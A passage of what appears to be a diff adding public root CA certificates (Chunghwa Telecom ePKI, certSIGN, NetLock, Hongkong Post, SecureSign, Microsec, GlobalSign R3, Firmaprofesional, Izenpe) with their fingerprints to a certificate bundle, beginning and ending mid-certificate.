+fca5DClMoTOi62c6ZYTTluLtdkVwj7Ur3vkj1kluPBS1xp81HlDQwY9qcEQCYsuu +HWhBp6pX6FOqB9IG9tUUBguRA3UsbHK1YZWaDYu5Def131TN3ubY1gkIl2PlwS6w +t0QmwCbAr1UwnjvVNioZBPRcHv/PLLf/0P2HQBHVESO7SMAhqaQoLf0V+LBOK/Qw +WyH8EZE0vkHve52Xdf+XlcCWWC/qu0bXu+TZLg== +-----END CERTIFICATE----- + +# Issuer: O=Chunghwa Telecom Co., Ltd. OU=ePKI Root Certification Authority +# Subject: O=Chunghwa Telecom Co., Ltd. 
OU=ePKI Root Certification Authority +# Label: "ePKI Root Certification Authority" +# Serial: 28956088682735189655030529057352760477 +# MD5 Fingerprint: 1b:2e:00:ca:26:06:90:3d:ad:fe:6f:15:68:d3:6b:b3 +# SHA1 Fingerprint: 67:65:0d:f1:7e:8e:7e:5b:82:40:a4:f4:56:4b:cf:e2:3d:69:c6:f0 +# SHA256 Fingerprint: c0:a6:f4:dc:63:a2:4b:fd:cf:54:ef:2a:6a:08:2a:0a:72:de:35:80:3e:2f:f5:ff:52:7a:e5:d8:72:06:df:d5 +-----BEGIN CERTIFICATE----- +MIIFsDCCA5igAwIBAgIQFci9ZUdcr7iXAF7kBtK8nTANBgkqhkiG9w0BAQUFADBe +MQswCQYDVQQGEwJUVzEjMCEGA1UECgwaQ2h1bmdod2EgVGVsZWNvbSBDby4sIEx0 +ZC4xKjAoBgNVBAsMIWVQS0kgUm9vdCBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTAe +Fw0wNDEyMjAwMjMxMjdaFw0zNDEyMjAwMjMxMjdaMF4xCzAJBgNVBAYTAlRXMSMw +IQYDVQQKDBpDaHVuZ2h3YSBUZWxlY29tIENvLiwgTHRkLjEqMCgGA1UECwwhZVBL +SSBSb290IENlcnRpZmljYXRpb24gQXV0aG9yaXR5MIICIjANBgkqhkiG9w0BAQEF +AAOCAg8AMIICCgKCAgEA4SUP7o3biDN1Z82tH306Tm2d0y8U82N0ywEhajfqhFAH +SyZbCUNsIZ5qyNUD9WBpj8zwIuQf5/dqIjG3LBXy4P4AakP/h2XGtRrBp0xtInAh +ijHyl3SJCRImHJ7K2RKilTza6We/CKBk49ZCt0Xvl/T29de1ShUCWH2YWEtgvM3X +DZoTM1PRYfl61dd4s5oz9wCGzh1NlDivqOx4UXCKXBCDUSH3ET00hl7lSM2XgYI1 +TBnsZfZrxQWh7kcT1rMhJ5QQCtkkO7q+RBNGMD+XPNjX12ruOzjjK9SXDrkb5wdJ +fzcq+Xd4z1TtW0ado4AOkUPB1ltfFLqfpo0kR0BZv3I4sjZsN/+Z0V0OWQqraffA +sgRFelQArr5T9rXn4fg8ozHSqf4hUmTFpmfwdQcGlBSBVcYn5AGPF8Fqcde+S/uU +WH1+ETOxQvdibBjWzwloPn9s9h6PYq2lY9sJpx8iQkEeb5mKPtf5P0B6ebClAZLS +nT0IFaUQAS2zMnaolQ2zepr7BxB4EW/hj8e6DyUadCrlHJhBmd8hh+iVBmoKs2pH +dmX2Os+PYhcZewoozRrSgx4hxyy/vv9haLdnG7t4TY3OZ+XkwY63I2binZB1NJip +NiuKmpS5nezMirH4JYlcWrYvjB9teSSnUmjDhDXiZo1jDiVN1Rmy5nk3pyKdVDEC +AwEAAaNqMGgwHQYDVR0OBBYEFB4M97Zn8uGSJglFwFU5Lnc/QkqiMAwGA1UdEwQF +MAMBAf8wOQYEZyoHAAQxMC8wLQIBADAJBgUrDgMCGgUAMAcGBWcqAwAABBRFsMLH +ClZ87lt4DJX5GFPBphzYEDANBgkqhkiG9w0BAQUFAAOCAgEACbODU1kBPpVJufGB +uvl2ICO1J2B01GqZNF5sAFPZn/KmsSQHRGoqxqWOeBLoR9lYGxMqXnmbnwoqZ6Yl +PwZpVnPDimZI+ymBV3QGypzqKOg4ZyYr8dW1P2WT+DZdjo2NQCCHGervJ8A9tDkP +JXtoUHRVnAxZfVo9QZQlUgjgRywVMRnVvwdVxrsStZf0X4OFunHB2WyBEXYKCrC/ +gpf36j36+uwtqSiUO1bd0lEursC9CBWMd1I0ltabrNMdjmEPNXubrjlpC2JgQCA2 +j6/7Nu4tCEoduL+bXPjqpRugc6bY+G7gMwRfaKonh+3ZwZCc7b3jajWvY9+rGNm6 +5ulK6lCKD2GTHuItGeIwlDWSXQ62B68ZgI9HkFFLLk3dheLSClIKF5r8GrBQAuUB +o2M3IUxExJtRmREOc5wGj1QupyheRDmHVi03vYVElOEMSyycw5KFNGHLD7ibSkNS +/jQ6fbjpKdx2qcgw+BRxgMYeNkh0IkFch4LoGHGLQYlE535YW6i4jRPpp2zDR+2z +Gp1iro2C6pSe3VkQw63d4k3jMdXH7OjysP6SHhYKGvzZ8/gntsm+HbRsZJB/9OTE +W9c3rkIO3aQab3yIVMUWbuF6aC74Or8NpDyJO3inTmODBCEIZ43ygknQW/2xzQ+D +hNQ+IIX3Sj0rnP0qCglN6oH4EZw= +-----END CERTIFICATE----- + +# Issuer: O=certSIGN OU=certSIGN ROOT CA +# Subject: O=certSIGN OU=certSIGN ROOT CA +# Label: "certSIGN ROOT CA" +# Serial: 35210227249154 +# MD5 Fingerprint: 18:98:c0:d6:e9:3a:fc:f9:b0:f5:0c:f7:4b:01:44:17 +# SHA1 Fingerprint: fa:b7:ee:36:97:26:62:fb:2d:b0:2a:f6:bf:03:fd:e8:7c:4b:2f:9b +# SHA256 Fingerprint: ea:a9:62:c4:fa:4a:6b:af:eb:e4:15:19:6d:35:1c:cd:88:8d:4f:53:f3:fa:8a:e6:d7:c4:66:a9:4e:60:42:bb +-----BEGIN CERTIFICATE----- +MIIDODCCAiCgAwIBAgIGIAYFFnACMA0GCSqGSIb3DQEBBQUAMDsxCzAJBgNVBAYT +AlJPMREwDwYDVQQKEwhjZXJ0U0lHTjEZMBcGA1UECxMQY2VydFNJR04gUk9PVCBD +QTAeFw0wNjA3MDQxNzIwMDRaFw0zMTA3MDQxNzIwMDRaMDsxCzAJBgNVBAYTAlJP +MREwDwYDVQQKEwhjZXJ0U0lHTjEZMBcGA1UECxMQY2VydFNJR04gUk9PVCBDQTCC +ASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALczuX7IJUqOtdu0KBuqV5Do +0SLTZLrTk+jUrIZhQGpgV2hUhE28alQCBf/fm5oqrl0Hj0rDKH/v+yv6efHHrfAQ +UySQi2bJqIirr1qjAOm+ukbuW3N7LBeCgV5iLKECZbO9xSsAfsT8AzNXDe3i+s5d +RdY4zTW2ssHQnIFKquSyAVwdj1+ZxLGt24gh65AIgoDzMKND5pCCrlUoSe1b16kQ +OA7+j0xbm0bqQfWwCHTD0IgztnzXdN/chNFDDnU5oSVAKOp4yw4sLjmdjItuFhwv 
+JoIQ4uNllAoEwF73XVv4EOLQunpL+943AAAaWyjj0pxzPjKHmKHJUS/X3qwzs08C +AwEAAaNCMEAwDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAcYwHQYDVR0O +BBYEFOCMm9slSbPxfIbWskKHC9BroNnkMA0GCSqGSIb3DQEBBQUAA4IBAQA+0hyJ +LjX8+HXd5n9liPRyTMks1zJO890ZeUe9jjtbkw9QSSQTaxQGcu8J06Gh40CEyecY +MnQ8SG4Pn0vU9x7Tk4ZkVJdjclDVVc/6IJMCopvDI5NOFlV2oHB5bc0hH88vLbwZ +44gx+FkagQnIl6Z0x2DEW8xXjrJ1/RsCCdtZb3KTafcxQdaIOL+Hsr0Wefmq5L6I +Jd1hJyMctTEHBDa0GpC9oHRxUIltvBTjD4au8as+x6AJzKNI0eDbZOeStc+vckNw +i/nDhDwTqn6Sm1dTk/pwwpEOMfmbZ13pljheX7NzTogVZ96edhBiIL5VaZVDADlN +9u6wWk5JRFRYX0KD +-----END CERTIFICATE----- + +# Issuer: CN=NetLock Arany (Class Gold) F\u0151tan\xfas\xedtv\xe1ny O=NetLock Kft. OU=Tan\xfas\xedtv\xe1nykiad\xf3k (Certification Services) +# Subject: CN=NetLock Arany (Class Gold) F\u0151tan\xfas\xedtv\xe1ny O=NetLock Kft. OU=Tan\xfas\xedtv\xe1nykiad\xf3k (Certification Services) +# Label: "NetLock Arany (Class Gold) F\u0151tan\xfas\xedtv\xe1ny" +# Serial: 80544274841616 +# MD5 Fingerprint: c5:a1:b7:ff:73:dd:d6:d7:34:32:18:df:fc:3c:ad:88 +# SHA1 Fingerprint: 06:08:3f:59:3f:15:a1:04:a0:69:a4:6b:a9:03:d0:06:b7:97:09:91 +# SHA256 Fingerprint: 6c:61:da:c3:a2:de:f0:31:50:6b:e0:36:d2:a6:fe:40:19:94:fb:d1:3d:f9:c8:d4:66:59:92:74:c4:46:ec:98 +-----BEGIN CERTIFICATE----- +MIIEFTCCAv2gAwIBAgIGSUEs5AAQMA0GCSqGSIb3DQEBCwUAMIGnMQswCQYDVQQG +EwJIVTERMA8GA1UEBwwIQnVkYXBlc3QxFTATBgNVBAoMDE5ldExvY2sgS2Z0LjE3 +MDUGA1UECwwuVGFuw7pzw610dsOhbnlraWFkw7NrIChDZXJ0aWZpY2F0aW9uIFNl +cnZpY2VzKTE1MDMGA1UEAwwsTmV0TG9jayBBcmFueSAoQ2xhc3MgR29sZCkgRsWR +dGFuw7pzw610dsOhbnkwHhcNMDgxMjExMTUwODIxWhcNMjgxMjA2MTUwODIxWjCB +pzELMAkGA1UEBhMCSFUxETAPBgNVBAcMCEJ1ZGFwZXN0MRUwEwYDVQQKDAxOZXRM +b2NrIEtmdC4xNzA1BgNVBAsMLlRhbsO6c8OtdHbDoW55a2lhZMOzayAoQ2VydGlm +aWNhdGlvbiBTZXJ2aWNlcykxNTAzBgNVBAMMLE5ldExvY2sgQXJhbnkgKENsYXNz +IEdvbGQpIEbFkXRhbsO6c8OtdHbDoW55MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A +MIIBCgKCAQEAxCRec75LbRTDofTjl5Bu0jBFHjzuZ9lk4BqKf8owyoPjIMHj9DrT +lF8afFttvzBPhCf2nx9JvMaZCpDyD/V/Q4Q3Y1GLeqVw/HpYzY6b7cNGbIRwXdrz +AZAj/E4wqX7hJ2Pn7WQ8oLjJM2P+FpD/sLj916jAwJRDC7bVWaaeVtAkH3B5r9s5 +VA1lddkVQZQBr17s9o3x/61k/iCa11zr/qYfCGSji3ZVrR47KGAuhyXoqq8fxmRG +ILdwfzzeSNuWU7c5d+Qa4scWhHaXWy+7GRWF+GmF9ZmnqfI0p6m2pgP8b4Y9VHx2 +BJtr+UBdADTHLpl1neWIA6pN+APSQnbAGwIDAKiLo0UwQzASBgNVHRMBAf8ECDAG +AQH/AgEEMA4GA1UdDwEB/wQEAwIBBjAdBgNVHQ4EFgQUzPpnk/C2uNClwB7zU/2M +U9+D15YwDQYJKoZIhvcNAQELBQADggEBAKt/7hwWqZw8UQCgwBEIBaeZ5m8BiFRh +bvG5GK1Krf6BQCOUL/t1fC8oS2IkgYIL9WHxHG64YTjrgfpioTtaYtOUZcTh5m2C ++C8lcLIhJsFyUR+MLMOEkMNaj7rP9KdlpeuY0fsFskZ1FSNqb4VjMIDw1Z4fKRzC +bLBQWV2QWzuoDTDPv31/zvGdg73JRm4gpvlhUbohL3u+pRVjodSVh/GeufOJ8z2F +uLjbvrW5KfnaNwUASZQDhETnv0Mxz3WLJdH0pmT1kvarBes96aULNmLazAZfNou2 +XjG4Kvte9nHfRCaexOYNkbQudZWAUWpLMKawYqGT8ZvYzsRjdT9ZR7E= +-----END CERTIFICATE----- + +# Issuer: CN=Hongkong Post Root CA 1 O=Hongkong Post +# Subject: CN=Hongkong Post Root CA 1 O=Hongkong Post +# Label: "Hongkong Post Root CA 1" +# Serial: 1000 +# MD5 Fingerprint: a8:0d:6f:39:78:b9:43:6d:77:42:6d:98:5a:cc:23:ca +# SHA1 Fingerprint: d6:da:a8:20:8d:09:d2:15:4d:24:b5:2f:cb:34:6e:b2:58:b2:8a:58 +# SHA256 Fingerprint: f9:e6:7d:33:6c:51:00:2a:c0:54:c6:32:02:2d:66:dd:a2:e7:e3:ff:f1:0a:d0:61:ed:31:d8:bb:b4:10:cf:b2 +-----BEGIN CERTIFICATE----- +MIIDMDCCAhigAwIBAgICA+gwDQYJKoZIhvcNAQEFBQAwRzELMAkGA1UEBhMCSEsx +FjAUBgNVBAoTDUhvbmdrb25nIFBvc3QxIDAeBgNVBAMTF0hvbmdrb25nIFBvc3Qg +Um9vdCBDQSAxMB4XDTAzMDUxNTA1MTMxNFoXDTIzMDUxNTA0NTIyOVowRzELMAkG +A1UEBhMCSEsxFjAUBgNVBAoTDUhvbmdrb25nIFBvc3QxIDAeBgNVBAMTF0hvbmdr +b25nIFBvc3QgUm9vdCBDQSAxMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC 
+AQEArP84tulmAknjorThkPlAj3n54r15/gK97iSSHSL22oVyaf7XPwnU3ZG1ApzQ +jVrhVcNQhrkpJsLj2aDxaQMoIIBFIi1WpztUlVYiWR8o3x8gPW2iNr4joLFutbEn +PzlTCeqrauh0ssJlXI6/fMN4hM2eFvz1Lk8gKgifd/PFHsSaUmYeSF7jEAaPIpjh +ZY4bXSNmO7ilMlHIhqqhqZ5/dpTCpmy3QfDVyAY45tQM4vM7TG1QjMSDJ8EThFk9 +nnV0ttgCXjqQesBCNnLsak3c78QA3xMYV18meMjWCnl3v/evt3a5pQuEF10Q6m/h +q5URX208o1xNg1vysxmKgIsLhwIDAQABoyYwJDASBgNVHRMBAf8ECDAGAQH/AgED +MA4GA1UdDwEB/wQEAwIBxjANBgkqhkiG9w0BAQUFAAOCAQEADkbVPK7ih9legYsC +mEEIjEy82tvuJxuC52pF7BaLT4Wg87JwvVqWuspube5Gi27nKi6Wsxkz67SfqLI3 +7piol7Yutmcn1KZJ/RyTZXaeQi/cImyaT/JaFTmxcdcrUehtHJjA2Sr0oYJ71clB +oiMBdDhViw+5LmeiIAQ32pwL0xch4I+XeTRvhEgCIDMb5jREn5Fw9IBehEPCKdJs +EhTkYY2sEJCehFC78JZvRZ+K88psT/oROhUVRsPNH4NbLUES7VBnQRM9IauUiqpO +fMGx+6fWtScvl6tu4B3i0RwsH0Ti/L6RoZz71ilTc4afU9hDDl3WY4JxHYB0yvbi +AmvZWg== +-----END CERTIFICATE----- + +# Issuer: CN=SecureSign RootCA11 O=Japan Certification Services, Inc. +# Subject: CN=SecureSign RootCA11 O=Japan Certification Services, Inc. +# Label: "SecureSign RootCA11" +# Serial: 1 +# MD5 Fingerprint: b7:52:74:e2:92:b4:80:93:f2:75:e4:cc:d7:f2:ea:26 +# SHA1 Fingerprint: 3b:c4:9f:48:f8:f3:73:a0:9c:1e:bd:f8:5b:b1:c3:65:c7:d8:11:b3 +# SHA256 Fingerprint: bf:0f:ee:fb:9e:3a:58:1a:d5:f9:e9:db:75:89:98:57:43:d2:61:08:5c:4d:31:4f:6f:5d:72:59:aa:42:16:12 +-----BEGIN CERTIFICATE----- +MIIDbTCCAlWgAwIBAgIBATANBgkqhkiG9w0BAQUFADBYMQswCQYDVQQGEwJKUDEr +MCkGA1UEChMiSmFwYW4gQ2VydGlmaWNhdGlvbiBTZXJ2aWNlcywgSW5jLjEcMBoG +A1UEAxMTU2VjdXJlU2lnbiBSb290Q0ExMTAeFw0wOTA0MDgwNDU2NDdaFw0yOTA0 +MDgwNDU2NDdaMFgxCzAJBgNVBAYTAkpQMSswKQYDVQQKEyJKYXBhbiBDZXJ0aWZp +Y2F0aW9uIFNlcnZpY2VzLCBJbmMuMRwwGgYDVQQDExNTZWN1cmVTaWduIFJvb3RD +QTExMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA/XeqpRyQBTvLTJsz +i1oURaTnkBbR31fSIRCkF/3frNYfp+TbfPfs37gD2pRY/V1yfIw/XwFndBWW4wI8 +h9uuywGOwvNmxoVF9ALGOrVisq/6nL+k5tSAMJjzDbaTj6nU2DbysPyKyiyhFTOV +MdrAG/LuYpmGYz+/3ZMqg6h2uRMft85OQoWPIucuGvKVCbIFtUROd6EgvanyTgp9 +UK31BQ1FT0Zx/Sg+U/sE2C3XZR1KG/rPO7AxmjVuyIsG0wCR8pQIZUyxNAYAeoni +8McDWc/V1uinMrPmmECGxc0nEovMe863ETxiYAcjPitAbpSACW22s293bzUIUPsC +h8U+iQIDAQABo0IwQDAdBgNVHQ4EFgQUW/hNT7KlhtQ60vFjmqC+CfZXt94wDgYD +VR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQEFBQADggEB +AKChOBZmLqdWHyGcBvod7bkixTgm2E5P7KN/ed5GIaGHd48HCJqypMWvDzKYC3xm +KbabfSVSSUOrTC4rbnpwrxYO4wJs+0LmGJ1F2FXI6Dvd5+H0LgscNFxsWEr7jIhQ +X5Ucv+2rIrVls4W6ng+4reV6G4pQOh29Dbx7VFALuUKvVaAYga1lme++5Jy/xIWr +QbJUb9wlze144o4MjQlJ3WN7WmmWAiGovVJZ6X01y8hSyn+B/tlr0/cR7SXf+Of5 +pPpyl4RTDaXQMhhRdlkUbA/r7F+AjHVDg8OFmP9Mni0N5HeDk061lgeLKBObjBmN +QSdJQO7e5iNEOdyhIta6A/I= +-----END CERTIFICATE----- + +# Issuer: CN=Microsec e-Szigno Root CA 2009 O=Microsec Ltd. +# Subject: CN=Microsec e-Szigno Root CA 2009 O=Microsec Ltd. 
+# Label: "Microsec e-Szigno Root CA 2009" +# Serial: 14014712776195784473 +# MD5 Fingerprint: f8:49:f4:03:bc:44:2d:83:be:48:69:7d:29:64:fc:b1 +# SHA1 Fingerprint: 89:df:74:fe:5c:f4:0f:4a:80:f9:e3:37:7d:54:da:91:e1:01:31:8e +# SHA256 Fingerprint: 3c:5f:81:fe:a5:fa:b8:2c:64:bf:a2:ea:ec:af:cd:e8:e0:77:fc:86:20:a7:ca:e5:37:16:3d:f3:6e:db:f3:78 +-----BEGIN CERTIFICATE----- +MIIECjCCAvKgAwIBAgIJAMJ+QwRORz8ZMA0GCSqGSIb3DQEBCwUAMIGCMQswCQYD +VQQGEwJIVTERMA8GA1UEBwwIQnVkYXBlc3QxFjAUBgNVBAoMDU1pY3Jvc2VjIEx0 +ZC4xJzAlBgNVBAMMHk1pY3Jvc2VjIGUtU3ppZ25vIFJvb3QgQ0EgMjAwOTEfMB0G +CSqGSIb3DQEJARYQaW5mb0BlLXN6aWduby5odTAeFw0wOTA2MTYxMTMwMThaFw0y +OTEyMzAxMTMwMThaMIGCMQswCQYDVQQGEwJIVTERMA8GA1UEBwwIQnVkYXBlc3Qx +FjAUBgNVBAoMDU1pY3Jvc2VjIEx0ZC4xJzAlBgNVBAMMHk1pY3Jvc2VjIGUtU3pp +Z25vIFJvb3QgQ0EgMjAwOTEfMB0GCSqGSIb3DQEJARYQaW5mb0BlLXN6aWduby5o +dTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAOn4j/NjrdqG2KfgQvvP +kd6mJviZpWNwrZuuyjNAfW2WbqEORO7hE52UQlKavXWFdCyoDh2Tthi3jCyoz/tc +cbna7P7ofo/kLx2yqHWH2Leh5TvPmUpG0IMZfcChEhyVbUr02MelTTMuhTlAdX4U +fIASmFDHQWe4oIBhVKZsTh/gnQ4H6cm6M+f+wFUoLAKApxn1ntxVUwOXewdI/5n7 +N4okxFnMUBBjjqqpGrCEGob5X7uxUG6k0QrM1XF+H6cbfPVTbiJfyyvm1HxdrtbC +xkzlBQHZ7Vf8wSN5/PrIJIOV87VqUQHQd9bpEqH5GoP7ghu5sJf0dgYzQ0mg/wu1 ++rUCAwEAAaOBgDB+MA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/BAQDAgEGMB0G +A1UdDgQWBBTLD8bfQkPMPcu1SCOhGnqmKrs0aDAfBgNVHSMEGDAWgBTLD8bfQkPM +Pcu1SCOhGnqmKrs0aDAbBgNVHREEFDASgRBpbmZvQGUtc3ppZ25vLmh1MA0GCSqG +SIb3DQEBCwUAA4IBAQDJ0Q5eLtXMs3w+y/w9/w0olZMEyL/azXm4Q5DwpL7v8u8h +mLzU1F0G9u5C7DBsoKqpyvGvivo/C3NqPuouQH4frlRheesuCDfXI/OMn74dseGk +ddug4lQUsbocKaQY9hK6ohQU4zE1yED/t+AFdlfBHFny+L/k7SViXITwfn4fs775 +tyERzAMBVnCnEJIeGzSBHq2cGsMEPO0CYdYeBvNfOofyK/FFh+U9rNHHV4S9a67c +2Pm2G2JwCz02yULyMtd6YebS2z3PyKnJm9zbWETXbzivf3jTo60adbocwTZ8jx5t +HMN1Rq41Bab2XD0h7lbwyYIiLXpUq3DDfSJlgnCW +-----END CERTIFICATE----- + +# Issuer: CN=GlobalSign O=GlobalSign OU=GlobalSign Root CA - R3 +# Subject: CN=GlobalSign O=GlobalSign OU=GlobalSign Root CA - R3 +# Label: "GlobalSign Root CA - R3" +# Serial: 4835703278459759426209954 +# MD5 Fingerprint: c5:df:b8:49:ca:05:13:55:ee:2d:ba:1a:c3:3e:b0:28 +# SHA1 Fingerprint: d6:9b:56:11:48:f0:1c:77:c5:45:78:c1:09:26:df:5b:85:69:76:ad +# SHA256 Fingerprint: cb:b5:22:d7:b7:f1:27:ad:6a:01:13:86:5b:df:1c:d4:10:2e:7d:07:59:af:63:5a:7c:f4:72:0d:c9:63:c5:3b +-----BEGIN CERTIFICATE----- +MIIDXzCCAkegAwIBAgILBAAAAAABIVhTCKIwDQYJKoZIhvcNAQELBQAwTDEgMB4G +A1UECxMXR2xvYmFsU2lnbiBSb290IENBIC0gUjMxEzARBgNVBAoTCkdsb2JhbFNp +Z24xEzARBgNVBAMTCkdsb2JhbFNpZ24wHhcNMDkwMzE4MTAwMDAwWhcNMjkwMzE4 +MTAwMDAwWjBMMSAwHgYDVQQLExdHbG9iYWxTaWduIFJvb3QgQ0EgLSBSMzETMBEG +A1UEChMKR2xvYmFsU2lnbjETMBEGA1UEAxMKR2xvYmFsU2lnbjCCASIwDQYJKoZI +hvcNAQEBBQADggEPADCCAQoCggEBAMwldpB5BngiFvXAg7aEyiie/QV2EcWtiHL8 +RgJDx7KKnQRfJMsuS+FggkbhUqsMgUdwbN1k0ev1LKMPgj0MK66X17YUhhB5uzsT +gHeMCOFJ0mpiLx9e+pZo34knlTifBtc+ycsmWQ1z3rDI6SYOgxXG71uL0gRgykmm +KPZpO/bLyCiR5Z2KYVc3rHQU3HTgOu5yLy6c+9C7v/U9AOEGM+iCK65TpjoWc4zd +QQ4gOsC0p6Hpsk+QLjJg6VfLuQSSaGjlOCZgdbKfd/+RFO+uIEn8rUAVSNECMWEZ +XriX7613t2Saer9fwRPvm2L7DWzgVGkWqQPabumDk3F2xmmFghcCAwEAAaNCMEAw +DgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFI/wS3+o +LkUkrk1Q+mOai97i3Ru8MA0GCSqGSIb3DQEBCwUAA4IBAQBLQNvAUKr+yAzv95ZU +RUm7lgAJQayzE4aGKAczymvmdLm6AC2upArT9fHxD4q/c2dKg8dEe3jgr25sbwMp +jjM5RcOO5LlXbKr8EpbsU8Yt5CRsuZRj+9xTaGdWPoO4zzUhw8lo/s7awlOqzJCK +6fBdRoyV3XpYKBovHd7NADdBj+1EbddTKJd+82cEHhXXipa0095MJ6RMG3NzdvQX +mcIfeg7jLQitChws/zyrVQ4PkX4268NXSb7hLi18YIvDQVETI53O9zJrlAGomecs +Mx86OyXShkDOOyyGeMlhLxS67ttVb9+E7gUJTb0o2HLO02JQZR7rkpeDMdmztcpH +WD9f +-----END CERTIFICATE----- + 
+# Issuer: CN=Autoridad de Certificacion Firmaprofesional CIF A62634068 +# Subject: CN=Autoridad de Certificacion Firmaprofesional CIF A62634068 +# Label: "Autoridad de Certificacion Firmaprofesional CIF A62634068" +# Serial: 6047274297262753887 +# MD5 Fingerprint: 73:3a:74:7a:ec:bb:a3:96:a6:c2:e4:e2:c8:9b:c0:c3 +# SHA1 Fingerprint: ae:c5:fb:3f:c8:e1:bf:c4:e5:4f:03:07:5a:9a:e8:00:b7:f7:b6:fa +# SHA256 Fingerprint: 04:04:80:28:bf:1f:28:64:d4:8f:9a:d4:d8:32:94:36:6a:82:88:56:55:3f:3b:14:30:3f:90:14:7f:5d:40:ef +-----BEGIN CERTIFICATE----- +MIIGFDCCA/ygAwIBAgIIU+w77vuySF8wDQYJKoZIhvcNAQEFBQAwUTELMAkGA1UE +BhMCRVMxQjBABgNVBAMMOUF1dG9yaWRhZCBkZSBDZXJ0aWZpY2FjaW9uIEZpcm1h +cHJvZmVzaW9uYWwgQ0lGIEE2MjYzNDA2ODAeFw0wOTA1MjAwODM4MTVaFw0zMDEy +MzEwODM4MTVaMFExCzAJBgNVBAYTAkVTMUIwQAYDVQQDDDlBdXRvcmlkYWQgZGUg +Q2VydGlmaWNhY2lvbiBGaXJtYXByb2Zlc2lvbmFsIENJRiBBNjI2MzQwNjgwggIi +MA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDKlmuO6vj78aI14H9M2uDDUtd9 +thDIAl6zQyrET2qyyhxdKJp4ERppWVevtSBC5IsP5t9bpgOSL/UR5GLXMnE42QQM +cas9UX4PB99jBVzpv5RvwSmCwLTaUbDBPLutN0pcyvFLNg4kq7/DhHf9qFD0sefG +L9ItWY16Ck6WaVICqjaY7Pz6FIMMNx/Jkjd/14Et5cS54D40/mf0PmbR0/RAz15i +NA9wBj4gGFrO93IbJWyTdBSTo3OxDqqHECNZXyAFGUftaI6SEspd/NYrspI8IM/h +X68gvqB2f3bl7BqGYTM+53u0P6APjqK5am+5hyZvQWyIplD9amML9ZMWGxmPsu2b +m8mQ9QEM3xk9Dz44I8kvjwzRAv4bVdZO0I08r0+k8/6vKtMFnXkIoctXMbScyJCy +Z/QYFpM6/EfY0XiWMR+6KwxfXZmtY4laJCB22N/9q06mIqqdXuYnin1oKaPnirja +EbsXLZmdEyRG98Xi2J+Of8ePdG1asuhy9azuJBCtLxTa/y2aRnFHvkLfuwHb9H/T +KI8xWVvTyQKmtFLKbpf7Q8UIJm+K9Lv9nyiqDdVF8xM6HdjAeI9BZzwelGSuewvF +6NkBiDkal4ZkQdU7hwxu+g/GvUgUvzlN1J5Bto+WHWOWk9mVBngxaJ43BjuAiUVh +OSPHG0SjFeUc+JIwuwIDAQABo4HvMIHsMBIGA1UdEwEB/wQIMAYBAf8CAQEwDgYD +VR0PAQH/BAQDAgEGMB0GA1UdDgQWBBRlzeurNR4APn7VdMActHNHDhpkLzCBpgYD +VR0gBIGeMIGbMIGYBgRVHSAAMIGPMC8GCCsGAQUFBwIBFiNodHRwOi8vd3d3LmZp +cm1hcHJvZmVzaW9uYWwuY29tL2NwczBcBggrBgEFBQcCAjBQHk4AUABhAHMAZQBv +ACAAZABlACAAbABhACAAQgBvAG4AYQBuAG8AdgBhACAANAA3ACAAQgBhAHIAYwBl +AGwAbwBuAGEAIAAwADgAMAAxADcwDQYJKoZIhvcNAQEFBQADggIBABd9oPm03cXF +661LJLWhAqvdpYhKsg9VSytXjDvlMd3+xDLx51tkljYyGOylMnfX40S2wBEqgLk9 +am58m9Ot/MPWo+ZkKXzR4Tgegiv/J2Wv+xYVxC5xhOW1//qkR71kMrv2JYSiJ0L1 +ILDCExARzRAVukKQKtJE4ZYm6zFIEv0q2skGz3QeqUvVhyj5eTSSPi5E6PaPT481 +PyWzOdxjKpBrIF/EUhJOlywqrJ2X3kjyo2bbwtKDlaZmp54lD+kLM5FlClrD2VQS +3a/DTg4fJl4N3LON7NWBcN7STyQF82xO9UxJZo3R/9ILJUFI/lGExkKvgATP0H5k +SeTy36LssUzAKh3ntLFlosS88Zj0qnAHY7S42jtM+kAiMFsRpvAFDsYCA0irhpuF +3dvd6qJ2gHN99ZwExEWN57kci57q13XRcrHedUTnQn3iV2t93Jm8PYMo6oCTjcVM +ZcFwgbg4/EMxsvYDNEeyrPsiBsse3RdHHF9mudMaotoRsaS8I8nkvof/uZS2+F0g +StRf571oe2XyFR7SOqkt6dhrJKyXWERHrVkY8SFlcN7ONGCoQPHzPKTDKCOM/icz +Q0CgFzzr6juwcqajuUpLXhZI9LK8yIySxZ2frHI2vDSANGupi5LAuBft7HZT9SQB +jLMi6Et8Vcad+qMUu2WFbm5PEn4KPJ2V +-----END CERTIFICATE----- + +# Issuer: CN=Izenpe.com O=IZENPE S.A. +# Subject: CN=Izenpe.com O=IZENPE S.A. 
+# Label: "Izenpe.com" +# Serial: 917563065490389241595536686991402621 +# MD5 Fingerprint: a6:b0:cd:85:80:da:5c:50:34:a3:39:90:2f:55:67:73 +# SHA1 Fingerprint: 2f:78:3d:25:52:18:a7:4a:65:39:71:b5:2c:a2:9c:45:15:6f:e9:19 +# SHA256 Fingerprint: 25:30:cc:8e:98:32:15:02:ba:d9:6f:9b:1f:ba:1b:09:9e:2d:29:9e:0f:45:48:bb:91:4f:36:3b:c0:d4:53:1f +-----BEGIN CERTIFICATE----- +MIIF8TCCA9mgAwIBAgIQALC3WhZIX7/hy/WL1xnmfTANBgkqhkiG9w0BAQsFADA4 +MQswCQYDVQQGEwJFUzEUMBIGA1UECgwLSVpFTlBFIFMuQS4xEzARBgNVBAMMCkl6 +ZW5wZS5jb20wHhcNMDcxMjEzMTMwODI4WhcNMzcxMjEzMDgyNzI1WjA4MQswCQYD +VQQGEwJFUzEUMBIGA1UECgwLSVpFTlBFIFMuQS4xEzARBgNVBAMMCkl6ZW5wZS5j +b20wggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQDJ03rKDx6sp4boFmVq 